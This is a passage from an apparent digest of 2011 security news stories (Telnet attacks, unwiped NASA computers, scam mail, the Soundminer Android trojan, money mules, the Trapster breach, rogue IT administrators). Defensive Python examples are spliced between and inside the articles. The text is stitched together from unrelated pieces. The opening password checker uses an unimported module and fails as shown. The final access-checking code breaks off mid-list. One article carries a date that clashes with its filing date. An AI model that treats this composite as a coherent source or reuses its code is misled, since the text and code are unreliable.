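from datetime import date

# Constructed sample: a handful of entries from the "lazy password" table.
# Assumption: a real deployment loads a full breached-password list instead.
COMMON_PASSWORDS = {
    "123456", "password", "12345678", "qwerty", "abc123", "monkey",
    "letmein", "trustno1", "1q2w3e4r", "1qaz2wsx", "iloveyou", "sunshine",
}

# Constructed sample of first names (all appear in the table). Assumption:
# production code would use a proper dictionary of names and place names.
NAMES = {"jennifer", "michael", "michelle", "andrew", "matthew", "daniel",
         "george", "joshua", "jessica", "hannah", "william", "charlie"}

# "may" is left out on purpose: a three-letter match gives too many false hits.
MONTHS = {"january", "february", "march", "april", "june", "july", "august",
          "september", "october", "november", "december"}

# Undo the usual look-alike substitutions: 0->o, 1->i, 3->e, 4->a, 5->s, @->a, $->s
LEET = str.maketrans("01345@$", "oieasas")

# Ways a date of birth is commonly typed once separators are ignored.
DOB_FORMATS = ("%d%m%Y", "%m%d%Y", "%Y%m%d", "%d%m%y", "%m%d%y", "%Y")


def check_password(pw, date_of_birth=None, symbols_allowed=True):
    """Return the list of rule codes the password breaks (empty list = passes).

    The "change it regularly" recommendation is about password age, so it
    cannot be judged from the password text and is not checked here.
    """
    findings = []
    lowered = pw.lower()

    # Drop a trailing run of digits/symbols and undo substitutions, so that
    # "P@ssw0rd1" is recognised as the deny-listed word "password".
    core = re.sub(r"[\W\d_]+$", "", lowered).translate(LEET)
    if lowered in COMMON_PASSWORDS or core in COMMON_PASSWORDS:
        findings.append("common")

    if len(pw) < 8:
        findings.append("too_short")

    if not (any(c.isupper() for c in pw) and any(c.islower() for c in pw)):
        findings.append("no_mixed_case")

    # Digits must sit among the letters, not only after the last letter.
    digit_pos = [i for i, c in enumerate(pw) if c.isdigit()]
    last_letter = max((i for i, c in enumerate(pw) if c.isalpha()), default=-1)
    if not digit_pos:
        findings.append("no_digit")
    elif min(digit_pos) > last_letter:
        findings.append("digits_only_at_end")

    if symbols_allowed and all(c.isalnum() or c.isspace() for c in pw):
        findings.append("no_symbol")

    # Names and months, also when disguised with look-alike characters.
    normalised = lowered.translate(LEET)
    if any(word in normalised for word in NAMES | MONTHS):
        findings.append("name_or_month")

    # Date of birth in any common layout, separators ignored.
    if date_of_birth is not None:
        digits = "".join(c for c in pw if c.isdigit())
        if any(date_of_birth.strftime(f) in digits for f in DOB_FORMATS):
            findings.append("birth_date")

    return findings


if __name__ == "__main__":
    # Constructed sample inputs.
    for candidate in ("password", "P@ssw0rd1", "Jennifer1975!", "t7Gr&u2Lq#x"):
        print(f"{candidate!r}: {check_password(candidate) or 'passes'}")
```

Note that "P@ssw0rd1" satisfies every composition rule in the list and is still rejected, because it is only a disguised form of the second most common password in the table.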

Main article sources

http://www.duosecurity.com/
Gawker online magazine website : http://gawker.com/
Computer World article : http://cwonline.computerworld.com/t/7046426/753476122/347203/0/


(2nd February 2011)


HACKERS TURN BACK THE CLOCK WITH TELNET ATTACKS
(Computerworld, dated 27th January 2011 author Jeremy Kirk)
www.computerworld.com

A new report from Akamai Technologies shows that hackers appear to be increasingly using the Telnet remote access protocol to attack corporate servers over mobile networks.

Akamai, which specializes in managing content and Web traffic, issues quarterly reports on Internet traffic trends. The latest report, which covers the third quarter of 2010, shows that 10% of attacks that came from mobile networks are directed at Port 23, which Telnet uses. That marks a somewhat unusual spike for the aging protocol.

Telnet is a remote access tool used to log into remote servers, but it has been gradually replaced by SSH, also known as Secure Shell. Administrators are generally advised to disable Telnet if the protocol is not used to prevent attacks targeting it, but some forget.

Although those attacks originated from mobile networks, Akamai said it did not appear that mobile devices were the source. "As noted previously, we believe that the observed attack traffic that is originating from known mobile networks is likely being generated by infected PC-type clients connecting to wireless networks through mobile broadband technologies and not by infected smartphones or similar mobile devices," according to the report.

Including all types of attack traffic sources, about 17% of attacks were directed at Telnet. Port 23 was "overwhelmingly the top targeted port for attacks" in Egypt, Peru and Turkey, Akamai said. "It is not clear if there is a common thread that connects these three countries, nor whether these observed attacks were brute-force login attempts or some other botnet-related traffic," the report said.

Akamai found that Port 445, which is a commonly used port for Microsoft products, was the most targeted one, although the attacks declined. The attacks peaked more than a year ago due to Conficker, a worm that rapidly spread and targeted the port.

"While the percentages are still fairly significant, this decline may signal ongoing efforts by network service providers to identify and isolate infected systems, as well as ongoing efforts to patch and/or upgrade infected systems," the report said.

Port 445 attacks were responsible for much of the attack traffic in Brazil, Germany, Italy, Russia, Taiwan and the US. In China, however, attacks against SSH, which runs on Port 22, were more common than those against Port 445, Akamai said.

Latest Akamai report : http://www.akamai.com/stateoftheinternet/

(2nd February 2011)


 

FAIL : NASA SOLD SPACE SHUTTLE PC'S WITHOUT WIPING SECRET DATA
(Computerworld, dated 8th December 2011 author Darlene Storm)
www.computerworld.com

For sale, used computer packed full of secret NASA Space Shuttle data. As part of a plan to securely end the Space Shuttle program, NASA is getting rid of old computers. However, NASA officials failed to delete sensitive data on PCs and hard drives before selling the equipment. The Office of Inspector General found "serious" security breaches at NASA centers in Florida, Virginia, Texas and California.

NASA is full of very bright minds, so how did it manage to make such a noob mistake of selling PCs without wiping the hard drives? An audit found 10 of 14 computers that failed tests to ascertain they'd been wiped properly. One computer that was to be sold still contained sensitive Space Shuttle data, which was subject to export control by the International Traffic in Arms Regulations.

All electronic storage media is supposed to be wiped of data "to the degree that there is reasonable assurance that the data cannot be retrieved or reconstructed," the audit stated. NASA-approved software for sanitizing hard drives includes DBAN (Darik's Boot and Nuke), Secure Erase, and WipeDrive/WipeDrive Pro. Contractors in charge of deleting sensitive information used DBAN and another product - which were not NASA approved at Johnson's disposition center. Ames used BCwipe, which is DOD compliant, but not NASA approved. USA used Symantec DateGone which is not approved by NASA, DOD or NSA.

At Kennedy, another contractor, Abacus Technology Corporation, attempts to recover data from digitally sanitized PCs. If data is recovered, the outside of the computer is marked in large red letters as FAIL. Auditors found that IT managers weren't notified when a drive failed or wasn't wiped free of data at all. Some officials at NASA facilities didn't account for or track hard drives. Additionally, the auditors were not at all pleased with the lack of verification testing that drives were properly sanitized of sensitive data.

Pallets, each filled with about 44 old PCs, were also found in the recycling facility with NASA stickers and IP addresses still attached to the cases. Auditors wrote, "Release of NASA Internet Protocol addresses is a potential security weakness because these addresses could provide a hacker a means to gain unauthorized access to NASA's internal network. Knowing a specific Internet Protocol address allows a hacker to target a particular computer, test the system for vulnerabilities, and possibly load malicious software programs or access information on the computer or network."

Hard drives were missing from Langley Research Center in Virginia and from Kennedy. Some of those hard drives from Kennedy were later found inside a dumpster that was accessible to the public, the audit says.

All in all, the report determined that NASA protocols to correctly sanitize data were not being followed at Kennedy and Johnson space centers and at Ames and Langley research centers. The auditors were not happy with the CIO who "stated that NASA's policies would be updated and a new handbook created by the third quarter of fiscal year 2011." The audit, prepared by NASA's Inspector General, covered a 12-month period starting in June 2009.

With all the WikiLeaks drama and the government demanding the return of sensitive documents and information, this blunder is just pitiful. It would seem as if this failure to wipe sensitive data would leave NASA and the government red-faced.

(2nd February 2011)



MET POLICE SEIZING SCAM MAIL AIMED AT UK VICTIMS
(BBC NEWS, dated 25th January 2011)
www.bbc.co.uk

Scotland Yard detectives are working to seize thousands of items of scam mail aimed at people in the UK. It will be the first seizure of such post by the Metropolitan Police's economic and specialist crime command.

 

The letters are sent by professional fraudsters and encourage people to invest in schemes like fake lotteries. Police say an estimated £3.5bn is scammed from UK citizens each year and about £2.4bn of this is believed to be as a result of mail scams.

The police operation - which is being run in partnership with Royal Mail and international mail service provider Spring Global Mail - is part of a long-running police investigation into the organised criminal networks behind such scams. They expect to recover up to 5,000 items of mail.

Also involved are Lancashire Police and council trading standards offices in Westminster, Kent, East Sussex and Hampshire.

The mail being seized on Tuesday is being taken from the Spring Global Mail centre, which is passing suspect letters on to police.

People from abroad are able to post their mail to the UK and Spring Global Mail will re-post it, making it look as though it was posted in UK, a legal practice which criminals are taking advantage of.

The Met say Spring Global Mail have done nothing wrong, and many other companies use similar services to make mail originating abroad appear as if it was posted in the UK.

The police also say they analysed some 3,000 scam letters and only one fifth were sent using this service, known as "local look".

Targeted recipients
 
As well as the mail seizure, five return addresses or "virtual offices" in London identified as part of the scam process are being shut down and searched for criminal evidence.

These addresses consist of privately rented mail boxes.

The fraudsters, who send letters from several overseas countries, try to persuade people to part with money on false promises of holidays or luxury items.

After replying to one of these so-called "tempter letters" a victim's name is put on what is called a "suckers list" and sold to criminals all over the world.

These lists comprise many vulnerable people, including the elderly, who will be bombarded with mail.

Some have ended up in desperate financial straits, and some with health problems. According to the Metropolitan Police, there have been at least five suicides involving postal scam victims.

Detective Superintendent Mark Ponting, of the Met, said once people reply to one letter they are targeted by hundreds more every week, and can find it hard not to reply to others.

"I've met quite a few now, several dozen individuals, who find it difficult if not often impossible, once they're hooked, to stop responding to the mailings," he said.

"So you can give them all the consumer education in the world and actually, once they're hooked, they're not going to stop."

Parliamentary Bill
 
Gary Simpson, international director at Royal Mail, said: "We don't want any of our postmen or women handling or delivering mail that causes harm or is criminal in intent.

"Royal Mail is working hard with the police to clamp down on this type of distressing activity."

Meanwhile, Conservative MP Caroline Nokes is putting a Bill through Parliament that would enable police and customs to be able to seize some of the scam mail which enters the country.

But although it could raise awareness of the issue, her Bill has little chance of becoming law because of a lack of parliamentary time.

Ms Nokes said some victims received more than 100 letters a day after being targeted by fraudsters, and that criminals also used the telephone and e-mails.

However, police were aware of how and where some scam mail entered the country but were unable to stop it, the MP said.

She said trading standards officers were keen for the police, customs officers, and the National Fraud Authority to intercept scam mail, and for Royal Mail to disclose the details of potential victims to the local trading standards service.

"I do not suggest for one moment that there should be a blanket power to intercept mail without a warrant, but such mail is easy to identify, the same victims are being targeted hundreds and hundreds of times over and it ought not to be impossible to introduce appropriate safeguards against breaches of human rights," she said.

Ms Nokes also accepted that current data protection and human rights legislation could prevent interceptions.

(25th January 2011)


 

SAFER TRAVEL AT NIGHT - CHRISTMAS CRACKDOWN ON ILLEGAL CAB DRIVERS SEES 177 ARRESTS
(Transport for London website, dated 20th January 2011)
www.tfl.gov.uk

Safer Transport Command officers stepped up enforcement action against illegal cab drivers over the festive period.

- 177 drivers arrested for touting and 27 arrested for other cab-related offences
- New windscreen stickers used to warn drivers against illegal touting
- Officers warn 50,000 Londoners of the dangers in taking unbooked minicabs

The Metropolitan Police Service (MPS) Cab Enforcement Unit, part of the Transport for London (TfL) funded Safer Transport Command (STC), has arrested over 150 drivers for taxi touting over the festive period.

Any 'minicab' that isn't booked through a licensed minicab operator is illegal, uninsured for carrying passengers and potentially dangerous.

The operation was an integral part of the Safer Travel at Night (STaN) initiative, which is a partnership between the Mayor, TfL, MPS and the City of London Police (CoLP), who are working together to make travelling in London safer at night.

The police were supported by officers from TfL's Taxi and Private Hire Compliance and Enforcement Teams.

It involved over 300 enforcement activities at targeted locations across London with officers from the STC Cab Enforcement Unit, Safer Transport Teams, CoLP and TfL using various tactics to deter, disrupt and detect illegal cab drivers and get people home safely.

Along with high-visibility patrols, stop/checks on vehicles, intelligence-led operations and engaging with the public, officers used a new series of material aimed at raising awareness of touting and the enforcement action being taken against this illegal and dangerous activity.

Warning stickers get the message across

Operations over the festive period saw the introduction of large windscreen stickers that are placed on cars of people arrested on suspicion of illegally touting.

The new stickers, which state 'Driver arrested on suspicion of touting', are a warning to other drivers that touting will not be tolerated and that police and enforcement officers are taking action.

In addition to the vehicle stickers, officers were also carrying out roadside checks of vehicles and drivers and distributing leaflets to drivers and passengers reminding drivers of the law and the consequences of acting illegally.

Over 2,000 minicabs were stopped during the operation.

Posters have also been produced for all licensed private hire offices warning licensed drivers that if they tout for business they will lose their TfL licence.

Operation STaN covered every borough in the Capital, where officers from the Cab Enforcement Unit, Safer Transport Team, CoLP and TfL engaged with thousands of Londoners.

The officers provided safer travel at night information, informing the public that only black cabs can be stopped and picked up off the street without being booked and that minicabs, even those licensed by TfL, must always be booked through a licensed minicab operator.

Over 50,000 STaN leaflets were handed out to members of the public.

The safe way to take minicabs

Kulveer Ranger, the Mayor's Transport Adviser, said: 'It is good to see that thousands of Londoners have heeded the important advice and avoided the potential dangers of illegal minicabs this winter.

'However tempting illegal minicabs may seem, we need to use common sense and ensure we travel around the city as safely as possible by using black taxis and booking licensed minicabs. I want to thank all the hard working police officers who have made this operation such a great success.'

Chief Superintendent Joe Royle, Safer Transport Command, said: 'The Cab Enforcement Unit is dedicated to tackling taxi touts and this was an excellent result.

'The dangers of taking unlicensed minicabs should never be underestimated. Illegal cabs and touting undermine the legitimate cab trade. Our Cab Enforcement Unit has dedicated anti-tout initiatives to tackle touts and improve the safety of passengers who use taxis and private hire vehicles.
 
'Working with our partner agencies there are now many alternatives to ensure that by planning a journey home in advance, an evening out ends safely.'

Steve Burton, TfL's Director of Community Safety, Enforcement and Policing, said: 'The arrests over the festive period highlight the work that TfL and its policing partners are doing in order to stop illegal cab drivers operating in London. We are committed to tackling illegal touting and ensuring a safe travelling environment for the public.

'However as part of our efforts to crack down on illegal cab activity we also need Londoners to stop taking unbooked minicabs. Only black cabs can be hailed in the street or picked up at a rank without booking.'

Key tips on using minicabs

- Never approach a minicab on the street or accept a fare, they are acting illegally
- Always book so there is a record of your journey
- Only black cabs can pick passengers up on the street
- When travelling by minicab always book it; when it arrives, check it's for you and sit in the back
- To get three local cab numbers text 'CAB' to 60835**

Visit www.tfl.gov.uk/cabwise for more information


 

Further information

Since 2003 the Cab Enforcement Unit has made more than 6,000 arrests for touting and cab-related offences.

If you have had a bad experience in a minicab or taxi (black cab), please report the incident at tfl.gov.uk/contactcabs, call 0845 300 7000, or email TPH.Comms@tfl.gov.uk

Help and support is available for victims of sexual assault from The Havens.  Details can be found at thehavens.co.uk

TfL's 24 hour travel information call centre can also provide information and phone numbers for taxi and private hire services in London.  Call 0843 222 1234

(25th January 2011)


 

SOUNDMINER TROJAN HORSE STEALS ANDROID PHONE DATA
(Computerworld, dated 20th January 2011 author Jeremy Kirk)
www.computerworld.com

Researchers have developed a low-profile Trojan horse program for Google's Android mobile OS that steals data in a way that is unlikely to be detected by either a user or antivirus software.

The malware, called Soundminer, monitors phone calls and records when a person, for example, says their credit card number or enters one on the phone's keypad, according to the study.

Using various analysis techniques, Soundminer trims the extraneous recorded information down to the most essential, such as the credit card number itself, and sends just that small bit of information back to the attacker over the network, the researchers said.

The study was done by Roman Schlegel of City University of Hong Kong and Kehuan Zhang, Xiaoyong Zhou, Mehool Intwala, Apu Kapadia, XiaoFeng Wang of Indiana University in Bloomington, Indiana.

"We implemented Soundminer on an Android phone and evaluated our technique using realistic phone conversation data," they wrote. "Our study shows that an individual's credit card number can be reliably identified and stealthily disclosed. Therefore, the threat of such an attack is real."

Soundminer is designed to ask for as few permissions as possible to avoid suspicion. For example, Soundminer may be allowed access to the phone's microphone, but further access to transmit data, intercept outgoing phone calls and access contact lists might look suspicious.

So in another version of the attack, the researchers paired Soundminer with a separate Trojan, called Deliverer, which is responsible for sending the information collected by Soundminer.

Since Android could prevent that communication between applications, the researchers investigated a stealthy way for Soundminer to communicate with Deliverer. They found what they term are several "covert channels," where changes in a feature are communicated with other interested applications, such as vibration settings.

Soundminer could code its sensitive data in a form that looks like a vibration setting but is actually the sensitive data, where Deliverer could decode it and then send it to a remote server. That covert vibration settings channel only has 87 bits of bandwidth, but that is enough to send a credit card number, which is just 54 bits, they wrote.

Soundminer was coded to do the voice and number recognition on the phone itself, which avoids the need to send large chunks of data through the network for analysis, which might again trigger an alert from security software.

If it is installed on a device, users are likely to approve of the settings that Soundminer is allowed to use, such as the phone's microphone. Since Soundminer doesn't directly need network access due to its use of a covert side channel to send its information, it is unlikely to raise suspicion.
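A defender's view of the settings-based covert channel described above, as an added example that is not from the article or the researchers' study: it scans a constructed log of settings reads and writes for a rapid burst of changes by one app that a second app is polling. The log format, app names, key name, thresholds and the one-bit-per-change figure are all assumptions; only the 54-bit card-number size comes from the article.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

CARD_NUMBER_BITS = 54              # size of a card number as quoted in the article
BITS_PER_WRITE = 1                 # assumption: each setting change carries one bit
MAX_GAP = timedelta(seconds=2)     # assumption: writes closer than this form one run
MAX_WRITES_PER_RUN = 5             # assumption: a person rarely toggles more than this

# Hypothetical audit-log line: "<iso timestamp> app=<package> op=READ|WRITE key=<setting>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) app=(?P<app>\S+) op=(?P<op>READ|WRITE) key=(?P<key>\S+)"
)


def build_sample_log():
    """Constructed log: normal user changes plus one machine-speed burst."""
    t0 = datetime(2011, 1, 20, 10, 0, 0)
    lines = []

    def add(ts, app, op):
        lines.append(f"{ts.isoformat()} app={app} op={op} key=vibrate_setting")

    # Ordinary behaviour: the settings screen changes the value twice in a morning.
    add(t0, "com.example.settings_ui", "WRITE")
    add(t0 + timedelta(minutes=7), "com.example.settings_ui", "WRITE")
    add(t0 + timedelta(minutes=7, seconds=1), "com.example.dialer", "READ")
    # Suspicious behaviour: 60 changes in 6 seconds, each read by a second app.
    burst = t0 + timedelta(minutes=30)
    for i in range(60):
        add(burst + timedelta(milliseconds=100 * i), "com.example.recorder", "WRITE")
        add(burst + timedelta(milliseconds=100 * i + 50), "com.example.uploader", "READ")
    return lines


def parse(lines):
    """Yield (timestamp, app, op, key) for every well-formed line."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["app"], m["op"], m["key"]


def runs(timestamps, gap):
    """Split timestamps into runs whose consecutive gaps do not exceed `gap`."""
    run = []
    for ts in sorted(timestamps):
        if run and ts - run[-1] > gap:
            yield run
            run = []
        run.append(ts)
    if run:
        yield run


def detect(lines):
    """Flag apps that change one setting in a rapid run, and who was reading it."""
    writes, reads = defaultdict(list), defaultdict(list)
    for ts, app, op, key in parse(lines):
        (writes if op == "WRITE" else reads)[(app, key)].append(ts)

    alerts = []
    for (app, key), stamps in writes.items():
        for run in runs(stamps, MAX_GAP):
            if len(run) <= MAX_WRITES_PER_RUN:
                continue
            start, end = run[0], run[-1] + MAX_GAP
            # A second app polling the same key during the run is the likely receiver.
            readers = sorted(
                other for (other, k), rs in reads.items()
                if k == key and other != app
                and sum(start <= r <= end for r in rs) >= MAX_WRITES_PER_RUN
            )
            capacity = len(run) * BITS_PER_WRITE
            alerts.append({
                "writer": app,
                "key": key,
                "writes": len(run),
                "capacity_bits": capacity,
                "fits_card_number": capacity >= CARD_NUMBER_BITS,
                "readers": readers,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(build_sample_log()):
        print(alert)
```

The point for a reviewer is that neither app looks dangerous on its permissions alone; it is the paired write and read pattern on a shared setting that stands out.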

Two antivirus programs for Android, VirusGuard from SMobile Systems and Droid Security's AntiVirus, both failed to identify Soundminer as malware even when it was recording and uploading data, according to the researchers.

In an e-mail statement, Google officials in London did not directly address Soundminer but said that Android is designed to minimize the impact of "poorly programmed or malicious applications if they appear on a device."

"If users believe an application is harmful or inappropriate, they can flag it, give it a low rating, leave a detailed comment, and of course, remove it from their device," Google said. "Applications deemed to be in violation of our policies are removed from Market, and abusive developers can also be blocked from using the Android Market for repeated or egregious violations of our policies."

Editor's Note

This article describes an academic exercise. You may feel that this exercise would not exist in the real world. The thing is, criminal hacking teams often have millions of pounds at their disposal to carry out their own research and development of such intrusive software. With more and more "apps" being created to "make our life easier", criminals are becoming more adept at taking advantage of them.

(25th January 2011)


 

FRAUDSTERS MONEY MULES IN SHORT SUPPLY
(Computerworld, dated 20th January 2011 author Jeremy Kirk)
www.computerworld.com

A new security report from Cisco Systems estimates that the amount of stolen online bank account data far exceeds the number of people fraudsters can get to transfer stolen funds, who are known as "money mules."

A mule is someone who either knowingly helps or is tricked into moving money from a victim's bank account through their own account and then onto a third party, usually located in another country.

Despite increasing awareness of the schemes, which are often advertised as "work-at-home" jobs with generous salaries, many people still get caught up in the frauds.

Cisco said in its 2010 Annual Security Report that the ratio of stolen account credentials -- which can be acquired through phishing or hacking -- to available mule capacity could be as high as 10,000 to one.

Being a mule is a high-risk job, and many are caught. Last year, dozens of people were arrested in the U.S. and U.K. on charges they were part of a large gang that stole money from bank accounts using a sophisticated piece of malware known as the Zeus program.

Many of those arrested in both countries were from Eastern Europe. In the U.S., many had gained entry to the country on J-1 non immigrant visas, often granted to visiting students.

Those running the scam will often use a mule only once, since authorities are likely to shut down the mule's account quickly. The money is transferred from the victim's account to the mule's account, and the mule is then instructed to quickly withdraw the money and either do a wire transfer or an ACH (Automated Clearing House) transfer.

The ACH system is used by financial institutions for exchanging details of direct deposits, checks and cash transfers made by businesses and individuals. It can be used to send very large sums of money, which are difficult to recover once the money makes it to an account, for example, in the Ukraine.

If banks detect the fraud, the institutions can try to reverse the transfer, but it is "not a quick and easy process" to initiate, Cisco wrote in its report. The reason is that if a fraudster has started to withdraw some of the money, the reversal won't work.

"The appropriate thing for the bank to do is to keep trying with progressively smaller amounts until it succeeds in recouping at least a portion of the stolen money," according to Cisco's report. "However, many banks are not sophisticated enough to do this, and the money is lost."

(25th January 2011)


 

TWITTER HIT BY FAKE ANTI-VIRUS SOFTWARE SCAM
(Computerworld, dated 21st January 2011 author Jeremy Kirk)
www.computerworld.com

Twitter has been resetting passwords for accounts that started distributing links promoting fake antivirus software in an attack that used Google's Web address shortening service to conceal the links' destination.

The links, masked by Google's "goo.gl" URL shortener, bounce through a series of redirect URLs before landing on a Ukrainian top-level domain that then redirects to an IP address associated with other fake antivirus software scams, wrote Nicolas Brulez of Kaspersky Lab.

Victims landing on the fake antivirus software page are prompted to scan their computer. If they approve the scan, the page asks if they want to remove threats from their computer: doing so starts the download of a bogus security program called "Security Shield."

Fake antivirus programs remain a pervasive problem on the Internet, with hundreds of variations. The applications target Windows users, and the programs are often installed by exploiting vulnerabilities in a computer's software. Once installed, the applications badger users to pay for a full version of the program. Many of the programs are totally ineffective at actually removing malware from a computer.

Del Harvey, head of Twitter's Trust and Safety Team, wrote on her Twitter account that "we're working to remove the malware links and reset passwords on compromised accounts."

"Did you follow a goo.gl link that led to a page telling you to install 'Security Shield' Rogue AV?" she wrote. "That's malware. Don't install."

Although Brulez classified the attack as a worm, implying it spreads from account to account, Harvey said the issue was not related to a worm.

If the problem isn't spreading between Twitter users, that raises the question of how the attack began.

One possibility is that it is related to an attack on Gawker Media in December. In that incident, the e-mail addresses and passwords for registered users of the media company's Web sites were pilfered by a group called Gnosis. Twitter saw a raft of spam after the Gawker hack, as it is believed that many users used the same password for the Web sites, which made their Twitter accounts vulnerable.

(25th January 2011)


 

TRAPSTER HACK MAY HAVE EXPOSED MILLIONS OF iPOD, ANDROID PASSWORDS
(Computerworld, dated 20th January 2011 author Gregg Keizer)
www.computerworld.com

Millions of e-mail addresses and passwords may have been stolen from Trapster, an online service that warns iPhone, Android and BlackBerry owners of police speed traps, the company announced yesterday.

California-based Trapster has begun alerting its registered users and has published a short FAQ on the breach. "If you've registered your account with Trapster, then it's best to assume that your e-mail address and password were included among the compromised data," the FAQ stated.

But in the next breath, Trapster downplayed the threat, saying it wasn't sure that the addresses and passwords were actually harvested.

"While we know that we experienced a security incident, it is not clear that the hackers successfully captured any e-mail addresses or passwords, and we have nothing to suggest that this information has been used," Trapster said.

And when replying to follow-up questions today, Trapster claimed that not all its 10 million users were at risk.

"Only a portion of our users were affected," a company spokesman said via e-mail. "We are choosing not to provide a specific figure, but a majority of our users who download the app do not register, which means they did not provide an e-mail address, as it is not a requirement. So the figure is well below the 10 million users which has been reported."

Users must register with Trapster, and provide an e-mail address and password for the new account, in order to report speed traps. According to the Trapster site, more than 5,300 speed traps have been reported to the service so far today.

If criminals did collect the service's complete user list, the breach would be 25 times larger than the Gawker hack last month, when details of more than 400,000 Gawker accounts were published on the Internet.

Assuming just one-in-10 users registers with Trapster, the number of compromised passwords could still be two-and-a-half times bigger than Gawker's.

Trapster provides free apps for the iPhone, Android-based smartphones, the BlackBerry, Windows Mobile phones, and Garmin and TomTom GPS devices. The apps display a map with suspected speed traps -- the traps are reported by users of the service -- and warn when drivers are approaching a potential radar zone.

The danger posed to users is not limited to their Trapster accounts, a security expert pointed out today.

"You may not care very much if your credentials on Trapster have been compromised and may think that not too much harm can come from that," said Graham Cluley, a senior technology consultant with U.K.-based Sophos, in a post Thursday to the security company's blog. "But what if you use the same e-mail address/password combination on other Web sites such as your Twitter account, or Web e-mail address?"

Trapster website : www.trapster.com

Note : Trapster may be an American company, but it does operate within the UK and does have UK customers.

Conversely, save money by driving within the speed limit !

(25th January 2011)


 

SECURITY FAIL : WHEN TRUSTED IT PEOPLE GO BAD
(Computerworld, dated 18th January 2011, author Tam Harbert)
www.computerworld.com

Note : the following is an extract of an article that described 3 actual cases of IT fraud and sabotage within the workplace.

For the full article go to :

http://www.computerworld.com/s/article/9204581/Security_fail_When_trusted_IT_people_go_bad?taxonomyId=17&pageNumber=1

-------------------------------------------


It's a Chief Information Officer's (CIO) worst nightmare: You get a call from the Business Software Alliance (BSA), saying that some of the Microsoft software your company uses might be pirated.

You investigate and find that not only is your software illegal, it was sold to you by a company secretly owned and operated by none other than your own IT systems administrator, a trusted employee for seven years. When you start digging into the admin's activities, you find a for-pay porn Web site he's been running on one of your corporate servers. Then you find that he's downloaded 400 customer credit card numbers from your e-commerce server.

And here's the worst part: He's the only one with the administrative passwords.

Think it can't happen? It did, according to a security consultant who was called in to help the victim, a $250 million retailer in Pennsylvania. You never heard about it because the company kept it quiet.


An annual survey by CSO magazine, the U.S. Secret Service and CERT (a program of the Software Engineering Institute at Carnegie Mellon University) routinely finds that three quarters of companies that are victimized by insiders handle the matter internally, says Dawn Cappelli, technical manager of CERT's threat and incident management team. "So we know that [what's made public] is only the tip of the iceberg," she says. ( www.cert.org )

By keeping things quiet, however, victimized companies deny others the opportunity to learn from their experiences. CERT has tried to fill that void. It has studied insider threats since 2001, collecting information on more than 400 cases. In its most recent report, 2009's "Common Sense Guide to Prevention and Detection of Insider Threats", which analyzes more than 250 cases, CERT identifies some of the most common mistakes companies make: inadequate vetting during the hiring process, inadequate oversight and monitoring of access privileges and overlooking of red flags in behavior.

But threats from privilege-laden IT employees are especially hard to detect. For one thing, staffers' nefarious activities can look the same as their regular duties. IT employees routinely "edit and write scripts, edit code and write programs, so it doesn't look like anomalous activity," Cappelli says. And they know where your security is weakest and how to cover their tracks. You can't rely on technology, or any single precaution to protect yourself from rogue IT people. You have to look at the big picture.

"It requires not only looking at what they are doing online but also what's happening in the workplace," says Cappelli. "People really need to understand the patterns here, the story behind the numbers."

Computerworld went looking for some of those stories behind the numbers, incidents that have not been widely reported. Though the victimized companies wouldn't talk, the security consultants who helped clean up the messes would. Although each story has unique circumstances, together they show some of the typical patterns that CERT emphasizes. Employer, beware.


Pirating software -- and worse

The Pennsylvania retailer's tale of woe began in early 2008, when the BSA notified it that Microsoft had uncovered licensing discrepancies, according to John Linkous. Today, Linkous is chief security and compliance officer at eIQ Networks, a security consultancy. His experience with the incident involving the retailer is from his previous job, when he was vice president of operations at Sabera, a now-defunct security consultancy.

Microsoft had traced the sale of the suspect software to a client company's sysadmin. For purposes of this story, we'll call that sysadmin "Ed." When Linkous and other members of the Sabera team were secretly called in to investigate, they found that Ed had sold more than a half-million dollars in pirated Microsoft, Adobe and SAP software to his employer.

The investigators also noticed that network bandwidth use was abnormally high. "We thought there was some kind of network-based attack going on," says Linkous. They traced the activity to a server with more than 50,000 pornographic still images and more than 2,500 videos, according to Linkous.

In addition, a forensic search of Ed's workstation uncovered a spreadsheet containing hundreds of valid credit card numbers from the company's e-commerce site. While there was no indication that the numbers had been used, the fact that this information was contained in a spreadsheet implied that Ed was contemplating either using the card data himself or selling it to a third party, according to Linkous.

The Chief Financial Officer (CFO), who had originally received the call from the BSA, and others on the senior management team feared what Ed might do when confronted. He was the only one who had certain administrative passwords -- including passwords for the core network router/firewall, network switches, the corporate VPN, the HR system, the e-mail server administration, Windows Active Directory administration, and Windows desktop administration.

That meant that Ed could have held hostage nearly all the company's major business processes, including the corporate Web site, e-mail, financial reporting system and payroll. "This guy had keys to the kingdom," says Linkous.

So the company and Linkous' firm launched an operation right out of Mission: Impossible. They invented a ruse that required Ed to fly overnight to California. The long flight gave Linkous' team a window of about five and a half hours during which Ed couldn't possibly access the system. Working as fast as they could, the team mapped out the network and reset all the passwords. When Ed landed in California, "the Chief Operating Officer (COO) was there to meet him. He was fired on the spot."

Cost to the company

Linkous estimates that the incident cost the company a total of $250,000 to $300,000, which includes Sabera's fee, the cost of flying Ed to the West Coast on short notice, the cost of litigation against Ed, the costs associated with hiring a temporary network administrator and a new CIO, and the cost of making all of its software licenses legitimate.

Preventive measures

What could have prevented this disaster? Obviously, at least one other person should have known the passwords. But more significant was the lack of separation of duties. The retailer had a small IT staff (just six employees), so Ed was entrusted with both administrative and security responsibilities. That meant he was monitoring himself.

Separating duties can be a particularly tough challenge for companies with small IT staffs, Linkous acknowledges. He suggests small companies monitor everything, including logs, network traffic and system configuration changes, and have the results evaluated by someone other than the system administrator and his or her direct reports. Most important, he says, is to let IT people know that they are being watched.
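The two checks in the paragraphs above (more than one person holds each administrative password, and logs are evaluated by someone other than the administrator and his or her direct reports) can be run mechanically over an access inventory. The following is an added example, not part of the article: the system names echo those listed in the story, while the people other than "Ed", the org chart and the inventory itself are constructed for illustration.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class System:
    name: str
    credential_holders: frozenset   # people who know the administrative password
    log_reviewers: frozenset        # people who evaluate its logs and config changes


# Constructed org chart: person -> direct manager (None at the top).
MANAGER_OF = {
    "ed": "cio",
    "helpdesk1": "ed",
    "helpdesk2": "ed",
    "dba": "cio",
    "auditor": "cfo",
    "cio": "coo",
    "cfo": "coo",
    "coo": None,
}

# Constructed inventory for a small IT shop.
SYSTEMS = [
    System("core-router-firewall", frozenset({"ed"}), frozenset({"ed"})),
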